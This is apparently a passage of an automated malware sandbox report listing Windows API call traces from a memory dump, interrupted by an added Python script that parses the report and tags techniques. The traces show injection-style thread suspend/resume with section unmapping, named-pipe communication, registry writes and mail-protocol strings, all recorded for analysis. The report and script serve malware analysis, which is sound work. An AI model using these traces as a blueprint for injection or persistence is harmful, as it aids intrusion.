  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
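The "API ID" key that the Similarity section attaches to every function can be rebuilt from the "APIs" list alone, which is useful when hunting for the same routine across other reports or dumps. The example below is an added triage script, not part of the Joe Sandbox report: it parses the report's API lines, rebuilds the key, and tags a few call patterns visible in these entries. The grouping rule (count top-level calls only, ignore "Part of subcall" lines, strip the A/W suffix, order groups by call count with `$` between them, ASCII-sort within a group) is inferred from the keys printed in this report and is an assumption, not documented Joe Sandbox behaviour; the technique labels are the example's own. The sample input is constructed by transcribing the API lists of the FindNextFile loop at 001D9C3D, the overlapped pipe I/O routine at 001CB997 and the suspend/resume routine at 001DC393 shown above.

```python
import re
from collections import Counter

# Constructed sample: "APIs" lists of three function entries, in the report's own line format.
SAMPLE = """\
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Memory Dump Source
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?), ref: 001D837E
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Memory Dump Source
"""

# One report line: optional "Part of subcall function XXXX:", then Name.DLL(args), ref: addr
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<dll>[A-Za-z0-9]+)(?:\([^)]*\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")


def normalize(name):
    """Strip the ANSI/Unicode suffix (CreateFileA -> CreateFile, lstrlenW -> lstrlen).
    Heuristic: a trailing A or W after a lowercase letter; lstrcpyn, CancelIo are untouched."""
    if len(name) > 2 and name[-1] in "AW" and name[-2].islower():
        return name[:-1]
    return name


def parse_functions(text):
    """One dict per 'APIs' block: top-level calls, all calls (subcalls included), refs."""
    blocks, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = {"top": [], "all": [], "refs": []}
            blocks.append(cur)
            continue
        if cur is None or s == "Memory Dump Source":
            cur = None
            continue
        m = API_LINE.match(line)
        if not m:
            continue
        name = normalize(m.group("name"))
        cur["all"].append(name)
        if m.group("sub") is None:          # subcall entries do not count toward the key
            cur["top"].append(name)
            cur["refs"].append(m.group("ref"))
    return blocks


def api_id(top_level_names):
    """Rebuild the report's 'API ID' key (assumed rule, inferred from the keys in this report):
    group names by call count, most frequent group first, '$' between groups,
    plain ASCII sort inside a group so uppercase names precede lowercase ones."""
    by_count = {}
    for name, n in Counter(top_level_names).items():
        by_count.setdefault(n, []).append(name)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


# Example's own labels: (all of these required, at least one of these required), matched over
# the whole call tree so that behaviour reached only through subcalls is still flagged.
TECHNIQUES = {
    "section unmap + thread suspend/resume": ({"NtUnmapViewOfSection"}, {"SuspendThread", "ResumeThread"}),
    "named pipe IPC": (set(), {"CallNamedPipe", "ConnectNamedPipe", "DisconnectNamedPipe", "CreateNamedPipe"}),
    "overlapped I/O with timeout and cancel": ({"GetOverlappedResult", "WaitForMultipleObjects"}, {"CancelIo"}),
    "directory walk with timestamp compare": ({"FindNextFile", "CompareFileTime"}, set()),
}


def tag_techniques(all_names):
    seen = set(all_names)
    return [label for label, (need_all, need_any) in TECHNIQUES.items()
            if need_all <= seen and (not need_any or need_any & seen)]


def triage(text):
    """Per function entry: first top-level ref, rebuilt API ID, and matched technique labels."""
    return [{"first_ref": b["refs"][0] if b["refs"] else None,
             "api_id": api_id(b["top"]),
             "techniques": tag_techniques(b["all"])}
            for b in parse_functions(text)]


if __name__ == "__main__":
    for entry in triage(SAMPLE):
        print(entry)
```

Run against the three transcribed entries, the rebuilt keys equal the "API ID" values the report prints for them, which is the check that the inferred grouping rule holds before using it to correlate functions across other reports. Feeding the whole report text to `triage` gives one record per function, and the `first_ref` field ties each record back to the address in the dump.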
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Memory Dump Source
